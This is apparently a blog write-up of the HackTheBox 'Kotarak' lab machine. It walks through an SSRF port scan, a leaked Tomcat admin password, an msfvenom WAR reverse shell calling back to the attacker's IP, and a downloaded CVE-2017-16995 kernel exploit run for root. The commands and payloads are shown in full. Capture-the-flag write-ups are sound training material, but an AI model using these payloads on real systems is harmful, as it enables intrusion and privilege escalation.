HackTheBox: Kotarak

I started this machine by first running an Nmap scan:

# Nmap 7.91 scan initiated Tue Jan 26 13:40:52 2021 as: nmap -p- -sC -sV -oN scan -O 10.10.10.55
Nmap scan report for 10.10.10.55
Host is up (0.021s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 (RSA)
|   256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 (ECDSA)
|_  256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 (ED25519)
8009/tcp  open  ajp13   Apache Jserv (Protocol v1.3)
| ajp-methods: 
|   Supported methods: GET HEAD POST PUT DELETE OPTIONS
|   Potentially risky methods: PUT DELETE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp  open  http    Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-title: Apache Tomcat/8.5.5 - Error report
60000/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title:         Kotarak Web Hosting        
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=1/26%OT=22%CT=1%CU=39727%PV=Y%DS=2%DC=I%G=Y%TM=6010628
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 26 13:42:18 2021 -- 1 IP address (1 host up) scanned in 86.08 seconds

We can see there are multiple ports open. I started by investigating port 60000 which bought me to a page which allowed browsing to other pages through the web form.

I entered the localhost address for port 8080, which was the other open port found on the Nmap scan. It was successful in browsing to this page through the form. The HTTP request was:

http://10.10.10.55:60000/url.php?path=http%3A%2F%2F127.0.0.1:8080

I then decided to use WFUZZ to attempt to connect to other ports hosted on the machine which were not listening externally.

┌──(root💀kali)-[/home/kali/Documents/kotarak]
└─# wfuzz -z range,0-65535 --hl 2  http://10.10.10.55:60000/url.php?path=http://127.0.0.1:FUZZ                                                                                                                                         1 ⚙
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.55:60000/url.php?path=http://127.0.0.1:FUZZ
Total requests: 65536

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                   
=====================================================================

000000023:   200        4 L      4 W        62 Ch       "22"                                                                                                                                                                      
000000091:   200        11 L     18 W       156 Ch      "90"                                                                                                                                                                      
000000111:   200        17 L     24 W       187 Ch      "110"                                                                                                                                                                     
000000201:   200        3 L      2 W        22 Ch       "200"                                                                                                                                                                     
000000321:   200        26 L     109 W      1232 Ch     "320"                                                                                                                                                                     
000000889:   200        78 L     265 W      3955 Ch     "888"                                                                                                                                                                     
000003307:   200        3 L      7 W        123 Ch      "3306"                                                                                                                                                                    
000060001:   200        78 L     130 W      1171 Ch     "60000"                                                                                                                                                                   

Total time: 0
Processed Requests: 65536
Filtered Requests: 65528
Requests/sec.: 0

As you can see from the output, there was a number of pages returned. The one of interest was on port 888 which returned a Simple File Viewer:

The backup file on the page appears to be of a significant size. Looking at the source I could see to access this page the php parameter ?doc=backup was required.

<td class="tableElement"><a href="?doc=backup"  class="tableElement">backup</a></td>

Because of the layered requests through the browser not returning the correct result i had to forward the request to burp to URL encode the request. I sent the following request using BURP repeater to get the backup file.

GET /url.php?path=http%3a//127.0.0.1%3a888%3fdoc%3dbackup HTTP/1.1

The backup file was successfully returned:

HTTP/1.1 200 OK

Date: Sat, 30 Jan 2021 18:31:13 GMT

Server: Apache/2.4.18 (Ubuntu)

Vary: Accept-Encoding

Content-Length: 2271

Connection: close

Content-Type: text/html; charset=UTF-8



<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
<!--
  NOTE:  By default, no user is included in the "manager-gui" role required
  to operate the "/manager/html" web application.  If you wish to use this app,
  you must define such a user - the username and password are arbitrary. It is
  strongly recommended that you do NOT use one of the users in the commented out
  section below since they are intended for use with the examples web
  application.
-->
<!--
  NOTE:  The sample user and role entries below are intended for use with the
  examples web application. They are wrapped in a comment and thus are ignored
  when reading this file. If you wish to configure these users for use with the
  examples web application, do not forget to remove the <!.. ..> that surrounds
  them. You will also need to set the passwords to something appropriate.
-->
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
    <user username="admin" password="3@g01PdhB!" roles="manager,manager-gui,admin-gui,manager-script"/>

</tomcat-users>


Near the bottom of the response a username and password is provided.

I knew from past experience that Tomcat tends to have a management page at http://10.10.10.55:8080/manager/html

I browsed to this page hosted through port 8080 and was greeting with a login prompt. I entered the details provided in the backup file and successfully logged in.

You are able to get RCE through this Tomcat Web Application Manager by uploading a WAR reverse shell. I created a WAR reverse shell using MSFVENOM:

┌──(root💀kali)-[/home/kali/Documents/kotarak]
└─# msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.15 lport=2600 -f war > shell.war
Payload size: 1091 bytes
Final size of war file: 1091 bytes

I then uploaded this file using the deployment feature in the Tomcat application manger.

Once uploaded the shell appears on the application list as seen in the screenshot. I started a netcat lister on my kali machine:

   ┌──(root💀kali)-[/home/kali/Documents/kotarak]
└─# nc -nvlp 2600                                                                                                                                                                                                                                                                                                                                                                                                                                                                    130 ⨯
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2600
Ncat: Listening on 0.0.0.0:2600

The shell was then executed by clicking the link in the application list:

   ┌──(root💀kali)-[/home/kali/Documents/kotarak]
└─# nc -nvlp 2600                                                                                                                                                                                                                                                                                                                                                                                                                                                                    130 ⨯
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2600
Ncat: Listening on 0.0.0.0:2600
Ncat: Connection from 10.10.10.55.
Ncat: Connection from 10.10.10.55:33422.
ls
backups
bin
boot
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old

As you can see from the output, the reverse shell was succesfully captured. I then ran “UNAME – A” to get the kernal version:

root@kotarak-dmz:/var/lib/lxc/kotarak-int/rootfs/root# uname -a
uname -a
Linux kotarak-dmz 4.4.0-83-generic #106-Ubuntu SMP Mon Jun 26 17:54:43 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

I could see that 4.4.0-83-generic was being used. As EXPLOIT exists for this kernel which esclated privilages to root. I downloaded the exploit and compiled it on my kali machine.

┌──(root💀kali)-[/var/www]
└─# wget https://raw.githubusercontent.com/SecWiki/linux-kernel-exploits/master/2017/CVE-2017-16995/upstream44.c
--2021-01-30 13:13:39--  https://raw.githubusercontent.com/SecWiki/linux-kernel-exploits/master/2017/CVE-2017-16995/upstream44.c
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.60.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.60.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5776 (5.6K) [text/plain]
Saving to: ‘upstream44.c’

upstream44.c                                               100%[=======================================================================================================================================>]   5.64K  --.-KB/s    in 0.007s  

2021-01-30 13:13:39 (757 KB/s) - ‘upstream44.c’ saved [5776/5776]

                                                                                                                                                                                                                                           
┌──(root💀kali)-[/var/www]
└─# gcc -o pwned upstream44.c

I then hosted the binary through HTTP and downloaded it to the kotarak machine and executed it:

tomcat@kotarak-dmz:/tmp$ wget http://10.10.14.15:8000/pwned
wget http://10.10.14.15:8000/pwned
--2021-01-30 13:13:57--  http://10.10.14.15:8000/pwned
Connecting to 10.10.14.15:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17880 (17K) [application/octet-stream]
Saving to: ‘pwned’

pwned               100%[===================>]  17.46K  81.9KB/s    in 0.2s    

2021-01-30 13:13:57 (81.9 KB/s) - ‘pwned’ saved [17880/17880]

tomcat@kotarak-dmz:/tmp$ chmod +x pwned
chmod +x pwned
tomcat@kotarak-dmz:/tmp$ ./pwned
./pwned
task_struct = ffff880037660e00
uidptr = ffff88003562c904
spawning root shell
root@kotarak-dmz:/root# cd /home
cd /home
root@kotarak-dmz:/home# ls
ls
atanas  tomcat
root@kotarak-dmz:/home# cd atanas
cd atanas
root@kotarak-dmz:/home/atanas# ls
ls
user.txt
root@kotarak-dmz:/home/atanas# cat user.txt
cat user.txt
[REDACTED}

The execution was successful and I was able to navigate to the atanas user and capture the user flag. I tried also to navigate to the root directory but the root flag wasnt present:

root@kotarak-dmz:/tmp# cd /root
cd /root
root@kotarak-dmz:/root# ls  
ls
app.log  flag.txt
root@kotarak-dmz:/root# cat flag.txt
cat flag.txt
Getting closer! But what you are looking for can't be found here.

I used the find command to search for the location of the root.txt flag:

root@kotarak-dmz:/# find . -name "root.txt"
find . -name "root.txt"
.................................
find: ‘./var/lib/lxcfs/cgroup/devices/system.slice/system-systemd\\x2dfsck.slice/devices.allow’: Permission denied
find: ‘./var/lib/lxcfs/cgroup/devices/system.slice/system-systemd\\x2dfsck.slice/devices.deny’: Permission denied
find: ‘./var/lib/lxcfs/cgroup/devices/user.slice/devices.allow’: Permission denied
find: ‘./var/lib/lxcfs/cgroup/devices/user.slice/devices.deny’: Permission denied
./var/lib/lxc/kotarak-int/rootfs/root/root.txt

We can see from the bottom line of the output that it where the root flag was located.

root@kotarak-dmz:/# cd /var      
cd /var/
root@kotarak-dmz:/var# cd lib
cd lib
root@kotarak-dmz:/var/lib# cd lxc
cd lxc
root@kotarak-dmz:/var/lib/lxc# cd kotarak-int
cd kotarak-int
root@kotarak-dmz:/var/lib/lxc/kotarak-int# cd rootfs
cd rootfs
root@kotarak-dmz:/var/lib/lxc/kotarak-int/rootfs# cd root
cd root
root@kotarak-dmz:/var/lib/lxc/kotarak-int/rootfs/root# ls
ls
root.txt
root@kotarak-dmz:/var/lib/lxc/kotarak-int/rootfs/root# cat root.txt
cat root.txt
[REDACTED]

With the root flag location I was able to capture the root flag sucessfully.

Leave a Reply

Your email address will not be published. Required fields are marked *